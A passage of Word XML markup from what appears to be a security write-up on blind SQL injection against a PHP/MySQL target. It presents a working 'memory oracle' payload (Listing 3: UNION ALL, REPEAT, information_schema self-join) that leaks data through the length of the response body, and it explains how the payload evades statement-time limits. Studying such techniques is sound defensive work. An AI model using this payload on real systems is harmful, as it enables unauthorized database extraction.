        </w:trPr>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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">... INTO @a</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">variable-write exemption</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.22 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">same</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The locking-clause attempts are the most instructive dead end. Appending </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the injected expression is syntactically valid because the injection sits at the tail of the WHERE clause, and the MySQL documentation states that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">max_execution_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> applies only to read-only SELECT statements which a locking read technically is not. The backend either ran MariaDB's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">max_statement_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which does not honor that exemption the same way, or a proxy-side killer that predates such nuance. Either way, the attacker-visible conclusion was identical and final:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-side wall-clock time is a closed channel: pad plus statement killer means a flat 2.2 seconds for anything.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two more recon facts from this phase shaped the final exploit. First, plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with huge rows also flatlined: MySQL materializes UNION results into a server-side temporary table for de-duplication, and that materialization is slow enough to trip the killer before a single byte reaches the client. The keyword </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> making it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> streams rows to the client instead, and that one keywo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rd turned out to be the difference between no channel and total compromise. Second, the 20-minute instance rotation meant the eventual pipeline had to be parallel and resumable, because any long single-threaded run would be cut off mid-extraction by a 404.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100006" w:name="_Toc100006"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. The Memory Oracle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100006"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100007" w:name="_Toc100007"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 From Timing to Allocation Size</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100007"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If time is closed, find another observable. The one that worked lives entirely on the client side, inside PHP's default mysqli behavior. The call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$db-&gt;query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses buffered mode: the mysqlnd library reads the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">entire result set into PHP memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch_row()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ever called, so the client not the server is the component that has to swallow whatever the query returns. That makes result-set size an attacker-controlled workload executed after SQL execution has finished, invisible to any statement killer.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack: build a result set bigger than the PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">memory_limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (64 MB, read straight off the fatal message itself). The fatal fires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">inside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> before the final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'ill try to tell him, dw'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ever runs so the response body is missing its final line and shrinks from 4,557 bytes to roughly 167 bytes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A PHP fatal still runs shutdown functions, so the response is still padded to 2.0 seconds, but the body length delta is a clean, instantly readable oracle bit: long body means the query survived, short body means the condition made the allocation explode.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100008" w:name="_Toc100008"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Payload Anatomy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100008"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload skeleton that implemented this looks deceptively simple, but each of its four components exists to defeat a specific defense layer:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 3: The memory oracle payload skeleton</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 UNION ALL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT REPEAT('A', &lt;value&gt; * 400000)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM (SELECT 1 FROM information_schema.tables a,</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                 information_schema.tables b LIMIT 800) z</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION ALL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">no de-duplication, therefore no server-side temp table and no materialization step; rows stream directly to the client as they are produced. This single keyword is what keeps the request under the statement killer's radar.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cartesian row generator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the self-join of information_schema.tables limited to 800 rows is a portable way to multiply one expression into 800 rows, and it works on any install with a readable information_schema regardless of user table contents.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REPEAT('A', n) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">each row is n bytes wide. Rows are kept below max_allowed_packet so the server never rejects the packet itself; 800 rows at 400 KB each is 320 MB in total, far beyond the 64 MB PHP limit, so the fatal is deterministic rather than probabilistic.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Constant string head 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the injected SELECT keeps the outer query's single-column shape, so no column-count mismatch ever produces a real SQL error, which MYSQLI_REPORT_OFF would have hidden anyway.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">And because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">display_errors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the fatal body said exactly which allocation had killed the interpreter. Calibration against the live instance confirmed the relationship was linear with a small, constant driver overhead:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4: Calibration requested size versus leaked allocation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="c5d8d0" w:sz="1" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
